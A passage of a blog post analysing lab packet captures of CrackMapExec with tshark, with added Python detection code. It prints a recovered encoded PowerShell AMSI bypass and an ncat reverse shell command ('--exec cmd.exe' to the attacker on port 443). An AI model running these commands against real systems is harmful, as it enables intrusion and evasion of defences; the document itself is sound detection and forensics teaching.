22 43.418780 10.0.0.105 → 10.0.0.100 SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
23 43.426458 10.0.0.100 → 10.0.0.105 SMB2 235 Session Setup Request, NTLMSSP_AUTH, User: \
24 43.427636 10.0.0.105 → 10.0.0.100 SMB2 139 Session Setup Response
25 43.432235 10.0.0.100 → 10.0.0.105 SMB2 126 Session Logoff Request
26 43.432623 10.0.0.105 → 10.0.0.100 SMB2 126 Session Logoff Response
31 43.437344 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response
33 43.440996 10.0.0.100 → 10.0.0.105 SMB2 164 Negotiate Protocol Request
34 43.441606 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response
35 43.446277 10.0.0.100 → 10.0.0.105 SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
36 43.446815 10.0.0.105 → 10.0.0.100 SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
37 43.455948 10.0.0.100 → 10.0.0.105 SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\administrator
38 43.458155 10.0.0.105 → 10.0.0.100 SMB2 139 Session Setup Response
43 43.464624 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response
45 43.468269 10.0.0.100 → 10.0.0.105 SMB2 164 Negotiate Protocol Request
46 43.468962 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response
49 43.473830 10.0.0.100 → 10.0.0.105 SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
50 43.474372 10.0.0.105 → 10.0.0.100 SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
51 43.481931 10.0.0.100 → 10.0.0.105 SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\administrator
52 43.484388 10.0.0.105 → 10.0.0.100 SMB2 139 Session Setup Response
....
227 47.334141 10.0.0.105 → 10.0.0.100 SMB2 234 Encrypted SMB3
228 47.338399 10.0.0.100 → 10.0.0.105 SMB2 178 Encrypted SMB3
229 47.343532 10.0.0.105 → 10.0.0.100 SMB2 178 Encrypted SMB3
So far we have seen that the majority of this tool's SMB communication is encrypted. Let's see if there is anything we can learn from the "dcerpc" communication.
root@securitynik:~/cme# tshark -n -r cme-powershell.pcap -Y "dcerpc"
70 43.594887 10.0.0.100 → 10.0.0.105 DCERPC 166 Bind: call_id: 1, Fragment: Single, 1 context items: ISystemActivator V0.0 (32bit NDR), NTLMSSP_NEGOTIATE
71 43.595566 10.0.0.105 → 10.0.0.100 DCERPC 406 Bind_ack: call_id: 1, Fragment: Single, max_xmit: 4280 max_recv: 4280, 1 results: Acceptance, NTLMSSP_CHALLENGE
73 43.603971 10.0.0.100 → 10.0.0.105 DCERPC 524 AUTH3: call_id: 1, Fragment: Single, NTLMSSP_AUTH, User: SECURITYNIK\administrator
76 43.640433 10.0.0.100 → 10.0.0.105 ISystemActivator 566 RemoteCreateInstance request
77 43.645133 10.0.0.105 → 10.0.0.100 ISystemActivator 1078 RemoteCreateInstance response
81 43.682025 10.0.0.100 → 10.0.0.105 DCERPC 166 Bind: call_id: 1, Fragment: Single, 1 context items: f309ad18-d86a-11d0-a075-00c04fb68820 V0.0 (32bit NDR), NTLMSSP_NEGOTIATE
82 43.682530 10.0.0.105 → 10.0.0.100 DCERPC 406 Bind_ack: call_id: 1, Fragment: Single, max_xmit: 4280 max_recv: 4280, 1 results: Acceptance, NTLMSSP_CHALLENGE
86 43.702770 10.0.0.100 → 10.0.0.105 DCERPC 524 AUTH3: call_id: 1, Fragment: Single, NTLMSSP_AUTH, User: SECURITYNIK\administrator
88 43.718458 10.0.0.100 → 10.0.0.105 DCERPC 210 Request: call_id: 2, Fragment: Single, opnum: 6, Ctx: 0 f309ad18-d86a-11d0-a075-00c04fb68820 V0
89 43.719805 10.0.0.105 → 10.0.0.100 DCERPC 294 Response: call_id: 2, Fragment: Single, Ctx: 0 f309ad18-d86a-11d0-a075-00c04fb68820 V0
90 43.727167 10.0.0.100 → 10.0.0.105 DCERPC 166 Alter_context: call_id: 3, Fragment: Single, 1 context items: IRemUnknown V0.0 (32bit NDR), NTLMSSP_NEGOTIATE
91 43.727812 10.0.0.105 → 10.0.0.100 DCERPC 402 Alter_context_resp: call_id: 3, Fragment: Single, max_xmit: 4280 max_recv: 4280, 1 results: Acceptance, NTLMSSP_CHALLENGE
92 43.747847 10.0.0.100 → 10.0.0.105 DCERPC 524 AUTH3: call_id: 3, Fragment: Single, NTLMSSP_AUTH, User: SECURITYNIK\administrator
94 43.765583 10.0.0.100 → 10.0.0.105 IRemUnknown 182 RemRelease request Cnt=1 Refs=1-0
95 43.766108 10.0.0.105 → 10.0.0.100 IRemUnknown 118 RemRelease response -> S_OK
96 43.772729 10.0.0.100 → 10.0.0.105 DCERPC 166 Alter_context: call_id: 5, Fragment: Single, 1 context items: 9556dc99-828c-11cf-a37e-00aa003240c7 V0.0 (32bit NDR), NTLMSSP_NEGOTIATE
97 43.773407 10.0.0.105 → 10.0.0.100 DCERPC 402 Alter_context_resp: call_id: 5, Fragment: Single, max_xmit: 4280 max_recv: 4280, 1 results: Acceptance, NTLMSSP_CHALLENGE
98 43.788367 10.0.0.100 → 10.0.0.105 DCERPC 524 AUTH3: call_id: 5, Fragment: Single, NTLMSSP_AUTH, User: SECURITYNIK\administrator
100 43.827914 10.0.0.100 → 10.0.0.105 DCERPC 226 Request: call_id: 6, Fragment: Single, opnum: 6, Ctx: 2 9556dc99-828c-11cf-a37e-00aa003240c7 V0
101 43.835340 10.0.0.105 → 10.0.0.100 DCERPC 4326 Response: call_id: 6, Fragment: 1st, Ctx: 2
103 43.835429 10.0.0.105 → 10.0.0.100 DCERPC 4326 Response: call_id: 6, Fragment: Mid, Ctx: 2
105 43.835655 10.0.0.105 → 10.0.0.100 DCERPC 4326 Response: call_id: 6, Fragment: Mid, Ctx: 2
107 43.835711 10.0.0.105 → 10.0.0.100 DCERPC 4326 Response: call_id: 6, Fragment: Mid, Ctx: 2
109 43.835917 10.0.0.105 → 10.0.0.100 DCERPC 4326 Response: call_id: 6, Fragment: Mid, Ctx: 2
111 43.835981 10.0.0.105 → 10.0.0.100 DCERPC 790 Response: call_id: 6, Fragment: Last, Ctx: 2 9556dc99-828c-11cf-a37e-00aa003240c7 V0
114 44.446346 10.0.0.100 → 10.0.0.105 DCERPC 2050 Request: call_id: 7, Fragment: Single, opnum: 24, Ctx: 2 9556dc99-828c-11cf-a37e-00aa003240c7 V0
116 44.578642 10.0.0.105 → 10.0.0.100 DCERPC 1270 Response: call_id: 7, Fragment: Single, Ctx: 2 9556dc99-828c-11cf-a37e-00aa003240c7 V0
144 44.726719 10.0.0.100 → 10.0.0.105 DCERPC 2046 Request: call_id: 8, Fragment: Single, opnum: 24, Ctx: 2 9556dc99-828c-11cf-a37e-00aa003240c7 V0
147 44.753078 10.0.0.105 → 10.0.0.100 DCERPC 1270 Response: call_id: 8, Fragment: Single, Ctx: 2 9556dc99-828c-11cf-a37e-00aa003240c7 V0
177 44.960333 10.0.0.100 → 10.0.0.105 DCERPC 2738 Request: call_id: 9, Fragment: Single, opnum: 24, Ctx: 2 9556dc99-828c-11cf-a37e-00aa003240c7 V0
181 44.992849 10.0.0.105 → 10.0.0.100 DCERPC 1270 Response: call_id: 9, Fragment: Single, Ctx: 2 9556dc99-828c-11cf-a37e-00aa003240c7 V0
The above looks interesting in that there is some cleartext. Let's follow the stream to see if there is anything of interest. Please note I've edited the output below for brevity, keeping only what I believe was important.
root@securitynik:~/cme# tshark -q -n -r cme-powershell.pcap -n -z follow,tcp,ascii,10.0.0.100:37794,10.0.0.105:49666
===================================================================
Follow: tcp,ascii
Filter: ((ip.src eq 10.0.0.100 and tcp.srcport eq 37794) and (ip.dst eq 10.0.0.105 and tcp.dstport eq 49666)) or ((ip.src eq 10.0.0.105 and tcp.srcport eq 49666) and (ip.dst eq 10.0.0.100 and tcp.dstport eq 37794))
Node 0: 10.0.0.100:37794
Node 1: 10.0.0.105:49666
112
....5..NTLMSSP.........p...".".........@.......V.......p...........5...S.E.C.U.R.I.T.Y.N.I.K.a.d.m.i.n.i.s.t.r.a.t.o.r....T...J7..7...bOk63ZTRY........i.4.............`J9K....Ok63ZTRY........S.E.C.N.I.K.-.2.K.1.9.....S.E.C.U.R.I.T.Y.N.I.K...:.S.E.C.N.I.K.-.2.K.1.9...s.e.c.u.r.i.t.y.n.i.k...l.o.c.a.l...".s.e.c.u.r.i.t.y.n.i.k...l.o.c.a.l...".s.e.c.u.r.i.t.y.n.i.k...l.o.c.a.l.....`J9K...... .c.i.f.s./.S.E.C.N.I.K.-.2.K.1.9.........
.).yPDg...Q' S.
156
................\................@ic#..................l..9H...*..?#....c..............././.../.r.o.o.t./.c.i.m.v.2.................
.....................................................................................................q........0....M............R....__PARAMETERS..cmd.exe /Q /c cd \ 1> \\127.0.0.1\C$\Windows\Temp\kJpSGP 2>&1..C:\....C...........
....5......s.H.........
..........................................................................................................................................................................................................................................................p........0....L............Q....__PARAMETERS..cmd.exe /Q /c cd 1> \\127.0.0.1\C$\Windows\Temp\AZGdHz 2>&1..C:\.>A..........
....5.........n..[H....
..D.................object:Win32_ProcessStartup.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................$........0......................__PARAMETERS..cmd.exe /Q /c powershell.exe -exec bypass -window hidden -noni -nop -encoded WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AOwAKAHQAcgB5AHsAIAAKAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGEAbQBzAGkASQBuAGkAdABGAGEAaQBsAGUAZAAnACwAIAAnAE4AbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAIAAkAHQAcgB1AGUAKQAKAH0AYwBhAHQAYwBoAHsAfQAKAGcAZQB0AC0AcAByAG8AYwBlAHMAcwAKAA== 1> \\127.0.0.1\C$\Windows\Temp\RvhXCV 2>&1..C:\.FF..........
....5......hj..h$......
===================================================================
As we can see from the above, we seem to have some powershell code being executed. However, we do not see any results. This is still good, as at least we have something of interest at this point. Let's copy this code and decode it at the Linux command line.
root@securitynik:~/cme# echo "<encoded string from the stream above>" | base64 --decode
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};
try{
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true)
}catch{}
get-process
From the above, we can conclude that the "get-process" cmdlet was executed via powershell.
No more analysis for us to do on this pcap file via tshark.
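To turn the stream above into a repeatable check, here is an added Python example (not the post's own code and not CrackMapExec's): it pulls each Win32_Process.Create command line out of WMI stub data by looking for the `__PARAMETERS` marker followed by a `cmd.exe /Q /c` line redirected to the loopback admin share, and decodes any `-encoded` PowerShell as UTF-16LE, which is what `-EncodedCommand` actually carries. The sample stream and temp file names are constructed to mirror the capture; the same function covers the ncat.exe stream shown later in this post.

```python
import base64
import re

# CrackMapExec's WMI path (the stream above) calls Win32_Process.Create with a
# "__PARAMETERS" object whose command line is "cmd.exe /Q /c ..." redirected to
# the loopback admin share under Windows\Temp. The gap after the marker is a few
# non-printable bytes on the wire and "." in tshark's ascii rendering.
WMI_CMD_RE = re.compile(
    rb"__PARAMETERS.{1,8}?(cmd\.exe /Q /c .+?) 1> "
    rb"(\\\\127\.0\.0\.1\\C\$\\Windows\\Temp\\\w+) 2>&1",
    re.DOTALL,
)
# -e / -ec / -enc / -encoded / -encodedcommand followed by the base64 blob.
ENCODED_RE = re.compile(
    r"powershell(?:\.exe)?\s.*?-e(?:c|nc|ncoded|ncodedcommand)?\s+([A-Za-z0-9+/=]+)",
    re.IGNORECASE | re.DOTALL,
)


def encode_powershell(script: str) -> str:
    """What -EncodedCommand expects: base64 of the script in UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_powershell(blob: str):
    """Reverse of the above. A bare `base64 --decode` leaves the UTF-16 NULs
    in, which is why the terminal output above still looked readable."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def extract_wmi_commands(payload: bytes) -> list:
    """Every CrackMapExec-style Create command in a stream (raw bytes, or
    tshark's ascii follow output re-encoded as bytes), with any -encoded
    PowerShell decoded."""
    found = []
    for m in WMI_CMD_RE.finditer(payload):
        cmd = m.group(1).decode("latin-1")
        entry = {"command": cmd,
                 "output_file": m.group(2).decode("latin-1"),
                 "decoded_powershell": None}
        enc = ENCODED_RE.search(cmd)
        if enc:
            entry["decoded_powershell"] = decode_powershell(enc.group(1))
        found.append(entry)
    return found


# Constructed stream: three Create calls shaped like the capture above
# (cd \, cd, then an encoded one-liner); the temp file names are made up.
def _record(command: str, tmp: str) -> bytes:
    line = f"{command} 1> \\\\127.0.0.1\\C$\\Windows\\Temp\\{tmp} 2>&1"
    return b"\x00\x00__PARAMETERS\x00\x05" + line.encode("latin-1") + b"\x00C:\\\x00"


SAMPLE_STREAM = (
    _record("cmd.exe /Q /c cd \\", "kJpSGP")
    + _record("cmd.exe /Q /c cd", "AZGdHz")
    + _record("cmd.exe /Q /c powershell.exe -exec bypass -window hidden -noni "
              "-nop -encoded " + encode_powershell("get-process"), "RvhXCV")
)

if __name__ == "__main__":
    for e in extract_wmi_commands(SAMPLE_STREAM):
        print(e)
```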
Now that we know what a powershell command may look like when run via crackmapexec, let's take a look at a "normal" command being executed. In this case, if you remember, in the first post we executed "ncat.exe". Let's see how we may be able to detect this with raw packet analysis.
As always, let's first look at the protocol hierarchy of our pcap.
root@securitynik:~/cme# tshark -n -r cme-ncat.pcap -z io,phs -q
===================================================================
Protocol Hierarchy Statistics
Filter:
eth frames:356 bytes:86187
ip frames:356 bytes:86187
tcp frames:356 bytes:86187
nbss frames:160 bytes:34441
smb frames:3 bytes:381
smb2 frames:157 bytes:34060
dcerpc frames:31 bytes:39474
isystemactivator frames:2 bytes:1644
remunk frames:2 bytes:300
dcerpc.stub_data frames:5 bytes:21630
dcerpc.fragments frames:1 bytes:790
data frames:13 bytes:989
ssl frames:14 bytes:1075
tcp.segments frames:4 bytes:256
===================================================================
Now that we have the protocol hierarchy, let's look at the TCP conversations
root@securitynik:~/cme# tshark -n -r cme-ncat.pcap -q -z conv,tcp
================================================================================
TCP Conversations
Filter:<No Filter>
| <- | | -> | | Total | Relative | Duration |
| Frames Bytes | | Frames Bytes | | Frames Bytes | Start | |
10.0.0.100:57950 <-> 10.0.0.105:445 86 15850 100 15434 186 31284 0.023652000 20.0220
10.0.0.105:50602 <-> 10.0.0.100:443 29 1600 28 2126 57 3726 3.366351000 32.4745
10.0.0.105:49666 <-> 10.0.0.100:43388 26 9658 23 28398 49 38056 0.145434000 19.8985
10.0.0.100:57952 <-> 10.0.0.105:445 14 2952 15 2945 29 5897 0.042055000 19.9831
10.0.0.100:57948 <-> 10.0.0.105:445 9 1638 10 1166 19 2804 0.000000000 20.0444
10.0.0.100:60342 <-> 10.0.0.105:135 7 2808 9 1612 16 4420 0.098815000 19.9435
================================================================================
If we look at the first conversation above, we see it has the most bytes (15850). However, as we look at the second conversation, we see it has the longest duration of all the conversations (3.366 seconds). While we can start with the first conversation, I will instead in the interest of time start with the second, simply because it has the longest duration.
root@securitynik:~/cme# tshark -n -r cme-ncat.pcap -Y "( tcp.port == 50602 ) && ( tcp.port == 443 )" | more
190 3.366351 10.0.0.105 → 10.0.0.100 TCP 66 50602 → 443 [SYN, ECN, CWR] Seq=0 Win=64240 Len=0 MSS=1460 WS=256 SACK_PERM=1
191 3.366379 10.0.0.100 → 10.0.0.105 TCP 66 443 → 50602 [SYN, ACK] Seq=0 Ack=1 Win=29200 Len=0 MSS=1460 SACK_PERM=1 WS=128
192 3.366597 10.0.0.105 → 10.0.0.100 TCP 60 50602 → 443 [ACK] Seq=1 Ack=1 Win=2102272 Len=0
200 3.496322 10.0.0.105 → 10.0.0.100 TCP 96 50602 → 443 [PSH, ACK] Seq=1 Ack=1 Win=2102272 Len=42
201 3.496342 10.0.0.100 → 10.0.0.105 TCP 54 443 → 50602 [ACK] Seq=1 Ack=43 Win=29312 Len=0
202 3.496527 10.0.0.105 → 10.0.0.100 SSL 110 Continuation Data
203 3.496533 10.0.0.100 → 10.0.0.105 TCP 54 443 → 50602 [ACK] Seq=1 Ack=99 Win=29312 Len=0
204 3.511061 10.0.0.105 → 10.0.0.100 TCP 60 [TCP segment of a reassembled PDU]
205 3.511078 10.0.0.100 → 10.0.0.105 TCP 54 443 → 50602 [ACK] Seq=1 Ack=101 Win=29312 Len=0
............
347 30.994013 10.0.0.105 → 10.0.0.100 TCP 60 [TCP segment of a reassembled PDU]
348 30.994030 10.0.0.100 → 10.0.0.105 TCP 54 443 → 50602 [ACK] Seq=18 Ack=545 Win=29312 Len=0
349 30.994182 10.0.0.105 → 10.0.0.100 SSL 60 Continuation Data
350 30.994188 10.0.0.100 → 10.0.0.105 TCP 54 443 → 50602 [ACK] Seq=18 Ack=549 Win=29312 Len=0
351 35.836894 10.0.0.100 → 10.0.0.105 TCP 59 443 → 50602 [PSH, ACK] Seq=18 Ack=549 Win=29312 Len=5
352 35.837355 10.0.0.105 → 10.0.0.100 TCP 60 50602 → 443 [PSH, ACK] Seq=549 Ack=23 Win=2102272 Len=5
353 35.837371 10.0.0.100 → 10.0.0.105 TCP 54 443 → 50602 [ACK] Seq=23 Ack=554 Win=29312 Len=0
354 35.840523 10.0.0.105 → 10.0.0.100 TCP 60 50602 → 443 [FIN, ACK] Seq=554 Ack=23 Win=2102272 Len=0
355 35.840639 10.0.0.100 → 10.0.0.105 TCP 54 443 → 50602 [FIN, ACK] Seq=23 Ack=555 Win=29312 Len=0
356 35.840840 10.0.0.105 → 10.0.0.100 TCP 60 50602 → 443 [ACK] Seq=555 Ack=24 Win=2102272 Len=0
From the above, we see port 443, which suggests SSL communication. However, we see no SSL negotiation, which is typically done right after the 3-way handshake completes. Considering there is no SSL negotiation, is it possible that we can see the cleartext data? Let's reassemble the session by following the TCP stream to see what we get.
root@securitynik:~/cme# tshark -n -r cme-ncat.pcap -q -z follow,tcp,ascii,10.0.0.105:50602,10.0.0.100:443 | more
===================================================================
Follow: tcp,ascii
Filter: ((ip.src eq 10.0.0.105 and tcp.srcport eq 50602) and (ip.dst eq 10.0.0.100 and tcp.dstport eq 443)) or ((ip.src eq 10.0.0.100 and tcp.srcport eq 443) and (ip.dst eq 10.0.0.105 and tcp.dstport eq 50602))
Node 0: 10.0.0.105:50602
Node 1: 10.0.0.100:443
42
Microsoft Windows [Version 10.0.17763.253]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\>
whoami
whoami
securitynik\administrator
C:\>
net users
net users
User accounts for \\
-------------------------------------------------------------------------------
Administrator Guest
krbtgt
nakia neysa nik
Prague
saadia
securitynik
The command completed with one or more errors.
C:\>
exit
exit
Ahhh from above we see that even though the traffic is on port 443, we can see this communication is not encrypted. Interesting!
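As an added example (not from the post), the following Python shows the check implied above in code: whether the first bytes sent on a port-443 conversation look like a TLS ClientHello or like readable text that is worth following. Both sample payloads are constructed; the banner one mirrors the 42-byte first segment seen in frame 200.

```python
import string

# Constructed first payloads for the 443 conversation above. The Windows host
# (10.0.0.105) opened the connection, so its first segment (42 bytes) is the
# cmd.exe banner that ncat --exec handed over, not a TLS ClientHello.
NCAT_FIRST_PAYLOAD = b"Microsoft Windows [Version 10.0.17763.253]"
# Constructed start of a TLS 1.2 ClientHello record (type 0x16, version 0x0303,
# length 0x004a, handshake type 0x01) for comparison.
TLS_FIRST_PAYLOAD = bytes.fromhex("160303004a0100004603035f") + bytes(20)

PRINTABLE = set(string.printable.encode("ascii"))


def is_tls_client_hello(payload: bytes) -> bool:
    """A real SSL/TLS session on 443 starts with a handshake record whose first
    message is a ClientHello; the capture above has no such record at all."""
    if len(payload) < 6:
        return False
    if payload[0] != 0x16 or payload[1] != 0x03 or payload[2] > 0x04:
        return False
    record_len = int.from_bytes(payload[3:5], "big")
    return 0 < record_len <= 16384 + 256 and payload[5] == 0x01


def classify_443_session(first_payload: bytes) -> str:
    """'tls' if the first bytes are a ClientHello, 'plaintext' if they are
    mostly printable text (follow the stream!), else 'unknown'."""
    if is_tls_client_hello(first_payload):
        return "tls"
    if not first_payload:
        return "unknown"
    ratio = sum(b in PRINTABLE for b in first_payload) / len(first_payload)
    return "plaintext" if ratio > 0.9 else "unknown"


if __name__ == "__main__":
    print(classify_443_session(NCAT_FIRST_PAYLOAD))  # plaintext
    print(classify_443_session(TLS_FIRST_PAYLOAD))   # tls
```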
If we go through the other conversations, we see mostly unreadable traffic. However, as we follow the stream for the conversation with "10.0.0.105:49666" and "10.0.0.100:43388", we see the following:
root@securitynik:~/cme# tshark -n -r cme-ncat.pcap -q -z follow,tcp,ascii,10.0.0.105:49666,10.0.0.100:43388 | more
===================================================================
Follow: tcp,ascii
Filter: ((ip.src eq 10.0.0.105 and tcp.srcport eq 49666) and (ip.dst eq 10.0.0.100 and tcp.dstport eq 43388)) or ((ip.src eq 10.0.0.100 and tcp.srcport eq 43388) and (ip.dst eq 10.0.0.105 and tcp.dstport eq 49666))
Node 0: 10.0.0.100:43388
Node 1: 10.0.0.105:49666
......
.......................f..... ..D.................object:Win32_ProcessStartup................................................................................................................
.............................................................................................................................................................................................
...........q........0....M............R....__PARAMETERS..cmd.exe /Q /c cd \ 1> \\127.0.0.1\C$\Windows\Temp\YkGcDv 2>&1..C:\....ri..........
....5.......,L....f....
.............................................................................................................................................................................................
.............................................................................................................................................................................................
...........p........0....L............Q....__PARAMETERS..cmd.exe /Q /c cd 1> \\127.0.0.1\C$\Windows\Temp\egHJIv 2>&1..C:\..I..........
....5....... h...r@....
.............................................................................................................................................................................................
....................0......................__PARAMETERS..cmd.exe /Q /c c:\tools\ncat.exe --nodns --exec cmd.exe 10.0.0.100 443 1> \\127.0.0.1\C$\Windows\Temp\vYsGjo 2>&1..C:\.Cg..........
....5..........WG......
Above we see from the rebuilt session that, amongst other items, "ncat.exe" is executed with various arguments.
Ok. That's it for this post.
Posts in this series:
Having Fun with CrackMapExec
Having Fun with CrackMapExec - Log Analysis
Having Fun with CrackMapExec - Packet Analysis - CrackMapExec
Having Fun with CrackMapExec - Zeek (Bro) Analysis
Having Fun with CrackMapExec - Snort IDS/IPS Analysis